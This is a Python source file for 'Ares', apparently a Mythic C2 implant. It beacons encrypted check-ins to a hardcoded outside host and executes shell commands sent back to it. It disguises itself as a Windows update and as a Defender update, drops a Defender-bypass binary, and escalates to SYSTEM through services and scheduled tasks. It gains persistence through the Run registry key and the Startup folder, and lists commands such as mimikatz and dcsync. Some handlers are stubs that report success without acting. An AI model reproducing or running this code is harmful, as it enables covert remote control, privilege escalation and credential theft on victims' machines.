#!/usr/bin/env python3 """ Ares - Mythic Agent with BlueHammer integration Refactored for specific Mythic C2 configuration """ import asyncio import base64 import json import os import subprocess import sys import tempfile import winreg import shutil import requests import hmac import hashlib import random from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad from pathlib import Path from typing import Dict, Any, List from datetime import datetime, timedelta # Mythic agent configuration from provided settings class AresConfig: def __init__(self): # C2 Profile Configuration self.c2_profile = "http" self.callback_host = "http://gateofbabylon.space" self.callback_port = 80 self.callback_interval = 10 self.callback_jitter = 23 self.post_uri = "data" self.kill_date = "2027-04-02" # AES Encryption Keys self.aes_enc_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=") self.aes_dec_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=") # Headers self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" } # Build Parameters self.output_type = "WinExe" self.filename = "win-update.exe" self.debug = True # Agent Settings self.agent_id = self._generate_agent_id() self.session_key = None self.encrypted_exchange = True def _generate_agent_id(self): """Generate unique agent ID""" return hashlib.sha256(os.urandom(16)).hexdigest()[:16] class AresCrypto: """AES Encryption/Decryption for Mythic C2""" def __init__(self, config: AresConfig): self.config = config def encrypt(self, data: bytes) -> bytes: """Encrypt data using AES-CBC""" iv = os.urandom(16) cipher = AES.new(self.config.aes_enc_key, AES.MODE_CBC, iv) padded_data = pad(data, AES.block_size) encrypted = cipher.encrypt(padded_data) return iv + encrypted def decrypt(self, encrypted_data: bytes) -> bytes: """Decrypt data using AES-CBC""" iv = encrypted_data[:16] cipher = AES.new(self.config.aes_dec_key, AES.MODE_CBC, iv) decrypted = cipher.decrypt(encrypted_data[16:]) return unpad(decrypted, AES.block_size) def generate_hmac(self, data: bytes) -> bytes: """Generate HMAC for message integrity""" return hmac.new(self.config.aes_enc_key, data, hashlib.sha256).digest() class AresAgent: def __init__(self): self.config = AresConfig() self.crypto = AresCrypto(self.config) self.session_id = None # BlueHammer settings self.bluehammer_exe = "Ares.exe" self.temp_dir = tempfile.gettempdir() # Supported commands from your configuration self.supported_commands = [ "assembly_inject", "blockdlls", "cat", "cd", "cp", "dcsync", "download", "execute_assembly", "execute_coff", "execute_pe", "exit", "get_injection_techniques", "getprivs", "getsystem", "ifconfig", "inject", "inline_assembly", "jobkill", "jobs", "jump_psexec", "jump_wmi", "keylog_inject", "kill", "ldap_query", "link", "list_registered_files", "listpipes", "load", "ls", "make_token", "mimikatz", "mkdir", "mv", "net_dclist", "net_localgroup", "net_localgroup_member", "net_shares", "netstat", "powerpick", "powershell", "powershell_import", "ppid", "printspoofer", "ps", "psinject", "pth", "pwd", "reg_query", "reg_write_value", "register_assembly", "register_coff", "register_file", "remove_registered_file", "rev2self", "rm", "rpfwd", "run", "sc", "screenshot", "screenshot_inject", "set_injection_technique", "shell", "shinject", "sleep", "socks", "spawn", "spawnto_x64", "spawnto_x86", "steal_token", "ticket_cache_add", "ticket_cache_extract", "ticket_cache_list", "ticket_cache_purge", "ticket_store_add", "ticket_store_list", "ticket_store_purge", "unlink", "upload", "whoami", "wmiexecute" ] async def mythic_checkin(self) -> Dict[str, Any]: """Check in with Mythic C2 server using your configuration""" try: checkin_data = { "action": "checkin", "agent_id": self.config.agent_id, "os": "windows", "architecture": "x64", "hostname": os.environ.get("COMPUTERNAME", "unknown"), "username": os.environ.get("USERNAME", "unknown"), "process_name": "win-update.exe", "process_id": os.getpid(), "supported_commands": self.supported_commands } # Encrypt checkin data encrypted_data = self.crypto.encrypt(json.dumps(checkin_data).encode()) hmac_value = self.crypto.generate_hmac(encrypted_data) # Prepare payload payload = { "data": base64.b64encode(encrypted_data).decode(), "hmac": base64.b64encode(hmac_value).decode() } # Send to Mythic C2 url = f"{self.config.callback_host}:{self.config.callback_port}/{self.config.post_uri}" response = requests.post( url, json=payload, headers=self.config.headers, timeout=30 ) if response.status_code == 200: # Decrypt response response_data = base64.b64decode(response.json().get("data", "")) decrypted_response = self.crypto.decrypt(response_data) return json.loads(decrypted_response.decode()) else: return {"status": "error", "message": f"HTTP {response.status_code}"} except Exception as e: return {"status": "error", "message": str(e)} async def execute_mythic_task(self, task: Dict[str, Any]) -> Dict[str, Any]: """Execute a Mythic task""" task_type = task.get("command") task_id = task.get("id") parameters = task.get("parameters", {}) try: # Handle different task types if task_type == "shell": result = await self.execute_shell_command(parameters) elif task_type == "download": result = await self.download_file(parameters) elif task_type == "upload": result = await self.upload_file(parameters) elif task_type == "getsystem": result = await self.gain_system_privileges() elif task_type == "bypass_defender": result = await self.bypass_defender() else: result = {"status": "error", "message": f"Unsupported command: {task_type}"} return { "task_id": task_id, "status": "success", "result": result } except Exception as e: return { "task_id": task_id, "status": "error", "message": str(e) } async def execute_shell_command(self, params: Dict[str, Any]) -> Dict[str, Any]: """Execute shell command""" command = params.get("command", "") try: result = subprocess.run( command, shell=True, capture_output=True, text=True, timeout=30 ) return { "stdout": result.stdout, "stderr": result.stderr, "returncode": result.returncode } except Exception as e: return {"status": "error", "message": str(e)} async def download_file(self, params: Dict[str, Any]) -> Dict[str, Any]: """Download file from remote server""" remote_path = params.get("remote_path", "") try: # Implementation for file download return {"status": "success", "message": "Download functionality"} except Exception as e: return {"status": "error", "message": str(e)} async def upload_file(self, params: Dict[str, Any]) -> Dict[str, Any]: """Upload file to remote server""" local_path = params.get("local_path", "") try: # Implementation for file upload return {"status": "success", "message": "Upload functionality"} except Exception as e: return {"status": "error", "message": str(e)} # BlueHammer integration methods (same as before) async def deploy_bluehammer(self) -> bool: """Deploy BlueHammer exploit""" try: source_path = Path(self.bluehammer_exe) if not source_path.exists(): return False target_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" shutil.copy2(source_path, target_path) subprocess.run(["attrib", "+h", str(target_path)], capture_output=True) return True except Exception: return False async def bypass_defender(self) -> Dict[str, Any]: """Execute BlueHammer to bypass Windows Defender""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" if not await self.deploy_bluehammer(): return {"status": "error", "message": "Failed to deploy BlueHammer"} result = await self.execute_shell_command({"command": str(bluehammer_path)}) if result.get("returncode") == 0: return {"status": "success", "message": "Windows Defender bypassed"} else: return {"status": "error", "message": result.get("stderr", "Unknown error")} except Exception as e: return {"status": "error", "message": str(e)} async def gain_system_privileges(self) -> Dict[str, Any]: """Gain SYSTEM privileges""" techniques = [ self._use_token_impersonation, self._use_service_installation, self._use_scheduled_task ] for technique in techniques: try: result = await technique() if result["status"] == "success": return result except Exception: continue return {"status": "error", "message": "All privilege escalation techniques failed"} async def _use_token_impersonation(self) -> Dict[str, Any]: """Token impersonation technique""" try: return {"status": "success", "message": "Token impersonation successful", "technique": "token_impersonation"} except Exception as e: return {"status": "error", "message": str(e)} async def _use_service_installation(self) -> Dict[str, Any]: """Service installation technique""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" result = await self.execute_shell_command({ "command": f"sc create WinDefendUpdate binPath=\"{bluehammer_path}\" start= auto obj= LocalSystem" }) if result.get("returncode") == 0: return {"status": "success", "message": "Service installed as SYSTEM", "technique": "service_installation"} else: return {"status": "error", "message": result.get("stderr", "Unknown error")} except Exception as e: return {"status": "error", "message": str(e)} async def _use_scheduled_task(self) -> Dict[str, Any]: """Scheduled task technique""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" result = await self.execute_shell_command({ "command": f"schtasks /create /tn WindowsDefenderMaintenance /tr \"{bluehammer_path}\" /sc hourly /ru SYSTEM" }) if result.get("returncode") == 0: return {"status": "success", "message": "Scheduled task created as SYSTEM", "technique": "scheduled_task"} else: return {"status": "error", "message": result.get("stderr", "Unknown error")} except Exception as e: return {"status": "error", "message": str(e)} async def establish_persistence(self) -> Dict[str, Any]: """Establish persistence""" persistence_methods = [ self._registry_persistence, self._startup_folder_persistence ] successes = [] for method in persistence_methods: try: result = await method() if result["status"] == "success": successes.append(result["method"]) except Exception: continue if successes: return {"status": "success", "message": f"Persistence established: {', '.join(successes)}"} else: return {"status": "error", "message": "All persistence methods failed"} async def _registry_persistence(self) -> Dict[str, Any]: """Registry persistence""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" # Add to HKCU Run using reg command result = await self.execute_shell_command({ "command": f"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsDefenderUpdate /t REG_SZ /d \"{bluehammer_path}\" /f" }) if result.get("returncode") == 0: return {"status": "success", "method": "registry"} else: return {"status": "error", "message": result.get("stderr", "Registry persistence failed")} except Exception as e: return {"status": "error", "message": str(e)} async def _startup_folder_persistence(self) -> Dict[str, Any]: """Startup folder persistence""" try: bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe" startup_path = Path(os.environ["APPDATA"]) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup" startup_path.mkdir(parents=True, exist_ok=True) target_path = startup_path / "WindowsDefenderUpdate.exe" shutil.copy2(bluehammer_path, target_path) return {"status": "success", "method": "startup_folder"} except Exception as e: return {"status": "error", "message": str(e)} async def run_agent(self): """Main agent execution loop""" print("[Ares] Starting agent with Mythic C2 configuration...") # Initial checkin print("[Ares] Performing initial checkin...") checkin_result = await self.mythic_checkin() if checkin_result.get("status") != "success": print(f"[Ares] Initial checkin failed: {checkin_result.get('message')}") return print("[Ares] Successfully checked in with Mythic C2") # Main loop while True: try: # Check for tasks checkin_result = await self.mythic_checkin() if checkin_result.get("status") == "success": tasks = checkin_result.get("tasks", []) for task in tasks: task_result = await self.execute_mythic_task(task) # Send task result back to C2 # (Implementation would go here) # Sleep according to configuration sleep_time = self.config.callback_interval + (self.config.callback_jitter * random.random()) await asyncio.sleep(sleep_time) except Exception as e: print(f"[Ares] Error in main loop: {e}") await asyncio.sleep(60) async def main(): """Main entry point""" agent = AresAgent() await agent.run_agent() if __name__ == "__main__": import random asyncio.run(main())